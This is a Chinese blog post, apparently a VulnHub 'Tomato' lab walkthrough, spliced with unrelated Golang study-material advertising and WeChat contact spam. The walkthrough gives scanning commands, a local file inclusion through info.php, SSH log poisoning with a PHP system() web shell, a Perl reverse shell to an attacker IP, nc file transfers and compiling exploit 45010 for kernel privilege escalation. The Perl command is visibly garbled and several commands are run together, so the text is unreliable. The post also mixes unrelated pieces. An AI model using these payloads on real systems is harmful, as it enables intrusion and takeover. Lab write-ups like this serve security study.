靶机实战系列之Tomato靶机,Golang高级面试

最新推荐文章于 2024-07-26 10:06:23 发布
最新推荐文章于 2024-07-26 10:06:23 发布
阅读量372 收藏 5
点赞数 4
分类专栏: 2024年程序员学习 文章标签: golang 面试 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84264408/article/details/138013095
版权

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新Golang全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上Go语言开发知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以添加V获取:vip1024b (备注go)
img

正文

nmap -p21,80,2211,8888 -sC -sV 192.168.112.134

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

1.3 路径爬取

dirsearch -u 192.168.112.134 -w /usr/share/wordlists/dirb/common.txt

发现页面

http://192.168.112.134/antibot_image/antibots/info.php

存在文件包含

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

1.4 源码分析+文件包含

经源码分析 </?php include $_GET[‘image’];

image参数 存在 文件包含

view-source:http://192.168.112.134/antibot_image/antibots/info.php?image=/etc/passwd

本地文件包含发现账号tomcat

远程文件包含功能通过info.php发现已经关闭

1.5 写入日志

view-source:http://192.168.112.134/antibot_image/antibots/info.php?image=/var/log/auth.log

发现存在ubuntu系统默认写入身份认证文件路径

/var/log/auth.log

尝试登录 ssh操作后会写入身份认证日志文件

ssh aaaaaaaaaaaaaaaaa@192.168.112.134 -p 2211

同样的在日志文件中确实发现了存在相关记录

写入一句话木马

ssh ‘<?php echo system($_GET["cmd"]); ?>’@192.168.112.134 -p 2211

并没有一句话木马,脚本已经被加载

view-source:http://192.168.112.134/antibot_image/antibots/info.php?image=/var/log/auth.log&cmd=id

写入成功!

1.6 反弹shell

view-source:http://192.168.112.134/antibot_image/antibots/info.php?image=/var/log/auth.log&cmd=which%20perl

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

直接反弹shell

perl -MIO -e ‘ p = f o r k ; e x i t , i f ( p=fork;exit,if( p=fork;exit,if(p); c = n e w I O : : S o c k e t : : I N E T ( P e e r A d d r , " 192.168.112.128 : 4444 " ) ; S T D I N − > f d o p e n ( c=new IO::Socket::INET(PeerAddr,"192.168.112.128:4444");STDIN->fdopen( c=newIO::Socket::INET(PeerAddr,"192.168.112.128:4444");STDIN>fdopen(c,r);   − > f d o p e n ( ~->fdopen(  >fdopen(c,w);system$_ while<>;’

1.7 内核漏洞枚举

sudo apt search linux-exploitlinux-exploit-suggesterls /usr/share/linux-exploit-suggester``cp /usr/share/linux-exploit-suggester/linux-exploit-suggester.sh .

linux-exploit-suggester可以用来枚举内核漏洞

利用nc传文件

mv linux-exploit-suggester.sh les.shnc 192.168.112.134 4444 < les.sh -w 1nc -nvlp 4444 > les.sh chmod +x les.sh``./les.sh

传输成功

利用此漏洞成功

发现漏洞号为45010搜索此漏洞,gcc编译,传到靶机

searchsploit 45010cp /usr/share/exploitdb/exploits/linux/local/45010.c .gcc 45010.c -o expnc -lvnp 4444 > expnc 192.168.112.134 4444 < expchmod +x exp./exp

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

成功!!!

觉得内容不错,请点一下"赞"和"在看"

点击上方公众号

关注我们

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以添加V获取:vip1024b (备注Go)
img

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
f)

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以添加V获取:vip1024b (备注Go)
[外链图片转存中…(img-wSREUVjx-1713621607274)]

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84264408
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2024年最新靶机实战系列Tomato靶机,2024年最新神级Golang进阶笔记
2401_84919661的博客
05-12 258
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。(都打包成一块的了,不能一一展开,总共300多集)同样的在日志文件中确实发现了存在相关记录。1.6 反弹shell。
2024年最全靶机实战系列Tomato靶机(3),为了跳槽强刷1000道Golang真题
2401_84911119的博客
05-11 537
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。(都打包成一块的了,不能一一展开,总共300多集)
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
HackTheBox靶机系列之困难Reel
04-09
HackTheBox靶机系列之困难Reel 本篇文章主要介绍了Reel靶机的整个利用过程,从侦察到提权,涵盖了渗透测试、漏洞利用、信息收集等多个方面的知识点。 侦察阶段 在Reel靶机中,我们首先进行了侦察,扫描了21、22、...
靶机操作练习,earth 靶机实战练习
09-08
在这个案例中,我们通过一个名为"earth"的靶机进行了一系列的操作,旨在提升信息收集、Web应用分析、权限提升和漏洞利用等技能。 首先,我们进行了主机信息收集。通过探测IP地址192.168.119.129,发现靶机上开放了...
Vulnhub篇Tomato.zip
01-12
主要包括两部分,一部分是tomato的学习笔记过程,另一部分是,过程中使用到文件,供大家学习参考。
Golang学习笔记20240725,Go语言基础语法
Python私教
07-25 425
如果我们在遍历的时候,不想要key或者value,也可以用下划线替代,下划线叫做匿名变量。go语言里面的switch语句每个case天生就是独立的,不需要加break。指针可以直接对内存地址进行操作。使用*表示指针,使用&取地址。切片在go语言里面非常常用,因为其有动态扩展的特性。运行方式3:goland右键运行。使用加号可以对字符串进行拼接。
golang 接口
m0_70982551的博客
07-24 809
接口定义了一组方法,这些方法没有具体的实现。接口类型的变量可以存储任何实现了这些方法的类型的值。// 更多方法...在Go语言中,接口值是指存储了实现某个接口的具体类型值的变量。接口值由两部分组成:1.动态类型:这是接口值当前存储的实际类型。2.动态值:这是实际存储的值,该值必须实现了接口中定义的所有方法。
【VSCode实战Golang无法跳转问题竟是如此简单
最新发布
weixin_42206314的博客
07-26 538
workspace是golang1.18版本引入的新概念,就是VSCode打开的工作目录中,若是有多个mod文件,它会不知道使用哪一个,也就无法定位。但工作目录中,若是只有一个项目,那么它自然可以找到,也就可以正常“转到定义”。,开头说到了在VSCode中Golang无法跳转的问题,但文章的最后也没给出解决方案,只解决了安装Go插件的依赖问题。2.在已安装的扩展里面,找到Go扩展,点击右下角的齿轮标记,选择扩展设置,也会打开1的界面。无法跳转的问题,其实还是很简单的,只是被网上各种冗余信息误导了。
go 用字面量的方式创建对象
servepeople的博客
07-23 296
在 Go 语言中,可以使用字面量的方式创建对象(结构体)。这种方法可以简洁地初始化结构体,并且可以在定义和赋值时同时完成。这种方法可以让代码更加简洁和易读,尤其是在初始化对象时。为结构体方法添加单元测试以验证其功能。添加更多字段并尝试不同的结构体嵌套。
基于Golang+Vue3快速搭建的博客系统
席万里的博客
07-25 873
基于Golang+vue3的博客项目,已经部署到阿里云服务器上面,采用docker-compose一键部署的方式,对新手友好,适合新手练习的博客项目。
GoLangGolang 快速入门(第一篇)
abclui的专栏
07-23 918
1) visual studio code, Microsoft产品(简称VSCode):一个运行于Mac Os、Windows和Linux 之上的,默认提供Go语言的语法高亮,安装Go语言插件,还可以支持智能提示,编译运行等功能。
Go语言的异常处理
qq_31667253的博客
07-23 263
内嵌异常接口自定义异常 参考内置errors包 errorString结构体实现err1 := New("创建一个错误信息")if err1!= nil {fmt.Println("这里是错误信息:", err1)s stringreturn e.s// 输出// 这里是错误信息: 创建一个错误信息。
Elasticsearch:Golang ECS 日志记录 - zerolog
Elastic 中国社区官方博客
07-23 1004
ECS 记录器是你最喜欢的日志库的格式化程序/编码器插件。它们可让你轻松地将日志格式化为与 ECS 兼容的 JSON。在本教程中,我将详述如何编码器以 JSON 格式记录日志,并以 ECS处理错误字段的记录。
Go 语言任务编排 WaitGroup
禅与代码的艺术
07-24 1014
任务编排 WaitGroup
go语言Gin框架的学习路线(八)
juzihuaile的博客
07-22 850
期末放假在家自学go语言Gin框架,希望我们可以一起学习!
Golang 面试基础题】每日 5 题(五)
Newin2020的博客
07-23 1231
📚专栏简介:在这个专栏中,我将会分享 Golang 面试中常见的面试题给大家~
My-cmsms靶机实战:ARP与Nmap扫描漏洞检测
在本篇vulnhub靶机实战指南中,我们将会深入探讨针对"My-cmsms"靶机实战操作。My-cmsms是一个基于MyCMS搭建的靶机,提供了一系列安全漏洞供网络安全爱好者进行渗透测试和学习。本文档以第26页开始,涵盖了两个关键...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值